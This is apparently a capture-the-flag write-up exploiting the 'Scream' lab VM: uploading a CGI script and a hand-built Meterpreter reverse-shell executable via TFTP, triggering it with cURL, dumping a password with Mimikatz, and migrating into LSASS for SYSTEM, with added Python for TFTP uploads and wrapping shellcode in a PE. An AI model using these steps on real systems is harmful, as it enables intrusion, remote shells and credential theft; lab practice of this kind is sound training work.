published on in writeup
tags: scream

Scream - Method 2 (Longer/Harder)

FTP

As the original Nmap scan in Method 1 showed, there is an FTP service that allows anonymous read access to part of the file system. Peeking inside the bin and root folders gives a good indication that this is where the TinyWeb service is running; however, we have no write access, so FTP alone cannot be used to plant files.

TFTP

A UDP Nmap scan showed that port 69 (TFTP) may be open (UDP service detection is unreliable, hence the trailing question mark in the output).

[email protected]:~# nmap -n -sU -sV 192.168.127.130
69/udp open  tftp?
1 service unrecognized despite returning data.

The problem with TFTP is that the protocol has no directory listing and no way to ask which directory the service is rooted in, so we have no idea where uploaded files will land. The way to find out is to upload a marker file and look for it through the other services. I created a very basic HTML page and uploaded it via TFTP.

Using the web service and the FTP access, I could confirm the file was written to the root folder.

[email protected]:~# vi test.html
<html>
<body>
<p>This is a test.</p>
</body>
</html>

[email protected]:~# tftp 192.168.127.130
tftp> put test.html
Sent 58 bytes in 0.0 seconds

[email protected]:~# ftp 192.168.127.130
ftp> ls root
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp              0 Feb 08  2013 cgi-bin
---------- 1 ftp ftp          14539 Oct 31  2012 index.html
---------- 1 ftp ftp             63 May 16 13:56 test.html
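The exchange behind `tftp> put` is worth seeing once, because two things in it matter operationally: the server answers from a fresh UDP port (the transfer ID), which is why stateful firewalls often drop the data phase, and the classic clients default to netascii mode, which rewrites every LF as CRLF so that the byte count the client reports and the size the server stores can disagree. The following is an added example, not code from the writeup: a minimal RFC 1350 write client plus a loopback server so it can be exercised offline. The host, port and the `test.html` content are constructed, and the toy server stores the wire bytes without translating netascii back.

```python
"""Minimal RFC 1350 TFTP write client plus a loopback server for offline testing.
Added example; not code from the original writeup. Host, port and file content are constructed."""
import socket
import struct
import threading

WRQ, DATA, ACK, ERROR = 2, 3, 4, 5
BLOCK = 512

# Constructed sample: the page's test.html as five LF-terminated lines (53 bytes).
TEST_HTML = b"<html>\n<body>\n<p>This is a test.</p>\n</body>\n</html>\n"


def to_netascii(data: bytes) -> bytes:
    """Apply netascii line-ending rules: LF -> CR LF, lone CR -> CR NUL, CR LF left unchanged."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b == 0x0D and i + 1 < len(data) and data[i + 1] == 0x0A:
            out += b"\r\n"
            i += 2
            continue
        out += b"\r\0" if b == 0x0D else (b"\r\n" if b == 0x0A else bytes([b]))
        i += 1
    return bytes(out)


def tftp_put(host, port, filename, data, mode="octet", timeout=2.0):
    """Send a WRQ, then numbered 512-byte DATA blocks, waiting for each ACK. Returns wire bytes sent."""
    payload = to_netascii(data) if mode == "netascii" else data
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(struct.pack("!H", WRQ) + filename.encode() + b"\0" + mode.encode() + b"\0", (host, port))
        block, chunk = 0, b""
        while True:
            pkt, peer = sock.recvfrom(516)  # the server replies from a new port: its transfer TID
            op, num = struct.unpack("!HH", pkt[:4])
            if op == ERROR:
                raise OSError("tftp error %d: %s" % (num, pkt[4:].rstrip(b"\0").decode(errors="replace")))
            if op != ACK or num != block:
                continue  # stale or duplicate ACK
            if block and len(chunk) < BLOCK:
                break  # the final (short) block has been acknowledged
            block += 1
            chunk = payload[(block - 1) * BLOCK:block * BLOCK]
            sock.sendto(struct.pack("!HH", DATA, block) + chunk, peer)
    finally:
        sock.close()
    return len(payload)


def tftp_server_once(listen, store):
    """Accept one WRQ on `listen` and save the received bytes into dict `store` (name -> bytes)."""
    pkt, client = listen.recvfrom(516)
    if struct.unpack("!H", pkt[:2])[0] != WRQ:
        listen.sendto(struct.pack("!HH", ERROR, 4) + b"Illegal TFTP operation\0", client)
        return
    name = pkt[2:].split(b"\0", 1)[0].decode()
    xfer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # per-transfer socket, i.e. a new TID
    xfer.settimeout(2.0)
    buf, expected = bytearray(), 1
    try:
        xfer.sendto(struct.pack("!HH", ACK, 0), client)
        while True:
            pkt, _ = xfer.recvfrom(516)
            op, num = struct.unpack("!HH", pkt[:4])
            if op != DATA or num != expected:
                continue
            buf += pkt[4:]
            xfer.sendto(struct.pack("!HH", ACK, num), client)
            expected += 1
            if len(pkt) - 4 < BLOCK:
                break
    finally:
        xfer.close()
    store[name] = bytes(buf)  # stored as received; no reverse netascii translation in this toy server


def demo_upload(data, mode="octet"):
    """Upload `data` to a loopback server; return (bytes the server stored, wire bytes the client sent)."""
    listen = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listen.bind(("127.0.0.1", 0))
    listen.settimeout(5.0)
    store = {}
    worker = threading.Thread(target=tftp_server_once, args=(listen, store))
    worker.start()
    try:
        sent = tftp_put("127.0.0.1", listen.getsockname()[1], "test.html", data, mode)
    finally:
        worker.join()
        listen.close()
    return store["test.html"], sent


if __name__ == "__main__":
    for mode in ("octet", "netascii"):
        stored, sent = demo_upload(TEST_HTML, mode)
        print("%-8s client sent %d bytes, server stored %d bytes" % (mode, sent, len(stored)))
```

Against a real target, `tftp_put("192.168.127.130", 69, "test.html", TEST_HTML)` followed by a check through HTTP or FTP is the same marker-file trick the writeup uses. When the reported and listed sizes differ by exactly the number of lines in the file, netascii translation is the first thing to suspect; `tftp> mode binary` (octet) avoids it, which matters for the executables uploaded later.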

TinyWeb CGI

I downloaded TinyWeb from RITLabs and found that the download package includes some example CGI scripts.

I uploaded a few of these to the cgi-bin folder via TFTP and executed them via cURL.

[email protected]:~# cp scream/tinyweb/cgi/HELLO.PL /root/cgi-bin/hello.pl

[email protected]:~# tftp 192.168.127.130
tftp> put cgi-bin/hello.pl
Sent 330 bytes in 0.0 seconds

[email protected]:~# curl http://192.168.127.130/cgi-bin/hello.pl
Hello, World!

The next test was to see if I could upload a CGI script that would run an executable (i.e. a Meterpreter payload).

[email protected]:~# cp scream/tinyweb/cgi/helloexe.pl /root/cgi-bin/exploit.pl

Then change the line that runs the executable to:

print `exploit.exe`;

The backticks run the command relative to the CGI's working directory, so the executable has to sit next to the script in cgi-bin.

Payload

Now to build the payload, but there is an added complication. I found that normal PE32 executables created by msfpayload would not execute on the remote host, and if you examine doscgi.exe (one of the CGI examples in the TinyWeb download) you can see it is an MS-DOS executable.

There is no option in msfpayload or msfencode to do this as far as I can tell, so it has to be done manually.

The first stage is to produce the raw payload (the position-independent shellcode bytes, using msfpayload's R output).

[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.127.127 R > exploit_raw

Then convert this into assembly with the disassemble.rb sample script from the Metasm library shipped with the Metasploit framework.

[email protected]:~# ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb /root/exploit_raw > /root/exploit_asm

Two lines have to be added manually at the top of this file: a section directive that places the code in an rwx '.text' section, and an entrypoint directive so that execution starts at the first instruction of the payload.

[email protected]:~# vi exploit_asm 
.section '.text' rwx
.entrypoint

Then finally encode this into the final executable with the peencode.rb sample script.

[email protected]:~# ruby /usr/share/metasploit-framework/lib/metasm/samples/peencode.rb /root/exploit_asm
saved to file "a.out"

[email protected]:~# mv a.out /root/exploit.exe

[email protected]:~# file exploit.exe
exploit.exe: MS-DOS executable, MZ for MS-DOS
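What the two directives and peencode.rb produce is a PE with a single rwx section whose first byte is the entry point and no imports or relocations, since a position-independent stager resolves what it needs itself. The following is an added example, not the writeup's or Metasm's code: it wraps raw payload bytes in such a minimal 32-bit PE and then parses the result back, which is a better check than `file`, whose "MS-DOS executable" verdict only reflects the MZ stub that every PE carries. The SHELLCODE constant is constructed filler (an int3 sled and a ret), not a Meterpreter stager.

```python
"""Wrap raw shellcode in a minimal 32-bit PE: one rwx .text section, entry point at its first byte.
Added example, not the writeup's or Metasm's code. SHELLCODE is constructed filler."""
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_EXECUTABLE_IMAGE, IMAGE_FILE_32BIT_MACHINE = 0x0002, 0x0100
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3
IMAGE_BASE, SECTION_ALIGN, FILE_ALIGN = 0x00400000, 0x1000, 0x200
TEXT_RVA = SECTION_ALIGN  # the single section starts one page past the headers

# Constructed stand-in for the raw payload: int3 sled then ret. Not a real Meterpreter stager.
SHELLCODE = b"\xcc" * 16 + b"\xc3"


def align(n, a):
    return (n + a - 1) // a * a


def build_pe(code: bytes) -> bytes:
    """Return a complete PE32 image whose .text section is rwx and begins with `code`."""
    raw_size = align(len(code), FILE_ALIGN)
    virt_size = align(len(code), SECTION_ALIGN)
    size_of_headers = align(64 + 4 + 20 + 224 + 40, FILE_ALIGN)  # DOS, "PE\0\0", COFF, optional, 1 section

    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE signature immediately after the DOS header

    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 1, 0, 0, 0, 224,
                       IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE)

    optional = struct.pack(
        "<HBB" "IIIIIIIII" "HHHHHH" "IIII" "HH" "IIIIII",
        0x10B, 0, 0,                                  # PE32 magic, linker version
        raw_size, 0, 0,                               # SizeOfCode, initialized and uninitialized data
        TEXT_RVA, TEXT_RVA, TEXT_RVA, IMAGE_BASE,     # AddressOfEntryPoint, BaseOfCode, BaseOfData, ImageBase
        SECTION_ALIGN, FILE_ALIGN,
        4, 0, 0, 0, 4, 0,                             # OS, image and subsystem versions
        0, TEXT_RVA + virt_size, size_of_headers, 0,  # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
        IMAGE_SUBSYSTEM_WINDOWS_CUI, 0,               # Subsystem, DllCharacteristics
        0x100000, 0x1000, 0x100000, 0x1000, 0, 16,    # stack/heap reserve and commit, LoaderFlags, NumberOfRvaAndSizes
    ) + b"\0" * (16 * 8)                              # 16 empty data directories: no imports, no relocations

    section = struct.pack("<8sIIIIIIHHI", b".text", virt_size, TEXT_RVA, raw_size, size_of_headers,
                          0, 0, 0, 0, IMAGE_SCN_CNT_CODE | RWX)

    headers = bytes(dos) + b"PE\0\0" + coff + optional + section
    return headers.ljust(size_of_headers, b"\0") + code.ljust(raw_size, b"\0")


def pe_info(image: bytes) -> dict:
    """Parse back what matters: PE signature, entry RVA, and the first section's name and flags."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    opt_off = e_lfanew + 4 + 20
    opt_size = struct.unpack_from("<H", image, e_lfanew + 4 + 16)[0]
    entry = struct.unpack_from("<I", image, opt_off + 16)[0]
    name, vsize, vaddr, rsize, rptr, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", image, opt_off + opt_size)
    return {
        "mz": image[:2] == b"MZ",
        "pe": image[e_lfanew:e_lfanew + 4] == b"PE\0\0",
        "entry_rva": entry,
        "section": name.rstrip(b"\0").decode(),
        "section_rva": vaddr,
        "raw_offset": rptr,
        "rwx": flags & RWX == RWX,
        "entry_is_section_start": entry == vaddr,
    }


if __name__ == "__main__":
    import sys
    # usage: python wrap_pe.py exploit_raw exploit.exe   (no arguments: wrap the constructed filler)
    code = open(sys.argv[1], "rb").read() if len(sys.argv) == 3 else SHELLCODE
    image = build_pe(code)
    if len(sys.argv) == 3:
        open(sys.argv[2], "wb").write(image)
    print(pe_info(image))
```

Run `pe_info` on the file peencode.rb writes as well: if it reports a PE signature, an entry RVA equal to the section RVA and an rwx section, the image has the shape the asm directives ask for regardless of what `file` calls it. The section has to be writable as well as executable because the stager decodes and patches in place.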

Upload and Execute

Upload these two files via TFTP (in binary mode for the executable), then start the Metasploit multi/handler.

[email protected]:~# tftp 192.168.127.130
tftp> put cgi-bin/exploit.pl
Sent 538 bytes in 0.0 seconds
tftp> put cgi-bin/exploit.exe
Sent 1028 bytes in 0.0 seconds

[email protected]:~# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.127.127 E

I then used cURL to execute the CGI script, which in turn executes the exe. Because Perl backticks wait for the child to exit and capture its stdout, the cURL request will not return while the payload is alive; that is fine here, the handler receives the session regardless.

[email protected]:~# curl http://192.168.127.130/cgi-bin/exploit.pl
[*] Sending stage (769536 bytes) to 192.168.127.130
[*] Meterpreter session 1 opened (192.168.127.127:4444 -> 192.168.127.130:1034)

Post Exploitation

meterpreter > getuid
Server username: SCREAM\alex

Unlike in the previous method, where the SSH service was running as SYSTEM, the TinyWeb service is running as user alex. This means that privilege escalation is needed to reach SYSTEM.

First I loaded the Mimikatz extension to recover alex's password from memory. This was not strictly necessary, as there are no other services to authenticate to; I did it for the sake of completeness.

meterpreter > load mimikatz 
meterpreter > wdigest
0;34668  NTLM       SCREAM        alex             thisisaverylongpassword

All that is required to elevate is to migrate the Meterpreter session into a process running as SYSTEM. I attempted to migrate into PID 664 (LSASS). Two caveats: migrating into lsass.exe is risky, because if the injected thread crashes it Windows reboots the host, so a less critical SYSTEM process (pick one from the user column of ps) is usually the safer target; and the fact that this works at all from alex's session shows that alex holds local administrator rights, since a standard user cannot open a handle to a SYSTEM process.

meterpreter > migrate 664
[*] Migrating from 3272 to 664...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM